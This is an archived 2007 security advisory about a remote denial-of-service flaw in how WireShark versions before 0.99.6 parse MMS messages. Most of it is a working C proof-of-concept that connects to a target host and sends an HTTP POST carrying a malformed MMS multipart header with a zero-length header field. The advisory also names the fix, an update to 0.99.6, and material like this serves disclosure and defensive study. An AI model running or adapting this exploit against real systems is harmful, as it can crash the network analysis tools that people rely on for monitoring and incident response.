AOH :: HP Unsorted W :: TB12080.HTM

WireShark MMS Remote Denial of Service vulnerability



WireShark MMS Remote Denial of Service vulnerability
WireShark MMS Remote Denial of Service vulnerability



Title
====WireShark MMS Remote Denial of Service vulnerability

Date
===13 August 2007

Affected Software
================WireShark < 0.99.6
Maybe all version of Ethereal

Overview
=======MMS message parse flaw in WireShark implementation may allow a remote attacker to crash it causing denial of service.  

Vulnerability Description
====================MMS means "Multimedia Messaging Service". When WireShark parsing a MMS message which Content-Type is application/vnd.wap.multipart.mixed, and the header len 

of a multipart content equels to 0x00, then it will be crash.

Solution
=======Update to 0.99.6

PoC
===============================//main.cpp
#include 
#include 

#pragma comment(lib, "ws2_32")

char *http = 
	"POST / HTTP/1.0\r\n"
	"Content-Type: application/vnd.wap.mms-message\r\n";

char *hoststr = "Host: %s:%d\r\n";
char *contentlenstr = "Content-Length: %d\r\n\r\n";

unsigned char mms[] = 
{
	0x8c,0x80,//X-Mms-Message-Type: m-send-req(0x80)
	0x98,0x7a,0x77,0x65,0x6c,0x6c,0x00,//X-Mms-Transaction-ID: zwell
	0x8d,0x92,//X-Mms-MMS-Version: 1.2
	0x97,0x31,0x33,0x35,0x31,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x00,//To: 13510000000
	0x84,0xa3,//Content-Type: application/vnd.wap.multipart.mixed
	//////////////////////////////////////////////////
	0x01,//multipart,count
	0x0f,//HeadersLen
	0x05,//DataLen
	0x00,//headlen <<<=== If this is 0x00, then wireshark will be crash. The real value is the follow three lines bytes which is 0x0e
	///
	0x83,0x85,//Utf-8
	0x7a,0x77,0x65,0x6c,0x6c,0x2e,0x74,0x78,0x74,0x00,//Name: zwell.txt
	0x81,0xea,//Charset: utf-8
	///
	0x7a,0x77,0x65,0x6c,0x6c,//zwell
};

SOCKET connect_to_host(char *h, int p) 
{
	SOCKET sock;
	struct hostent *host;
	struct sockaddr_in saddr;

	if((host=gethostbyname(h))==NULL) 
	{
		printf("resolv host %s error\n", h);
		exit(-1);
	}

	if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) 
	{
		printf("create socket error\n");
		exit(-1);
	}
	memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
	saddr.sin_family=AF_INET;
	saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
	saddr.sin_port=htons(p);
	if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0) 
	{
		printf("connect to host %s on port %d error\n", h, p);
		exit(-1);
	}

	return sock;
}


void socket_init()
{
	WSADATA wsaData;
	WSAStartup(MAKEWORD(2,0), &wsaData);
}


int main(int argc, char **argv)
{
	SOCKET s;
	char sendbuf[1024];
	int len = 0;

printf("WireShark<0.99.6 MMS protocol DOS PoC\nCoded By ZwelL\nhttp://www.nosec.org\n"); 
	if(argc != 3)
	{
		printf("usage : %s  \n", argv[0]);
		exit(-1);
	}
	socket_init();
	s = connect_to_host(argv[1], atoi(argv[2]));
=09
	strcpy(&sendbuf[len], http);
	len += strlen(http);

	sprintf(&sendbuf[len], hoststr, argv[1], atoi(argv[2]));
	len = strlen(sendbuf);

	sprintf(&sendbuf[len], contentlenstr, sizeof(mms));
	len = strlen(sendbuf);

	memcpy(&sendbuf[len], mms, sizeof(mms));
	len += sizeof(mms);

	send(s, sendbuf, len, 0);

	printf("completed!\n");

	return 0;
}

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.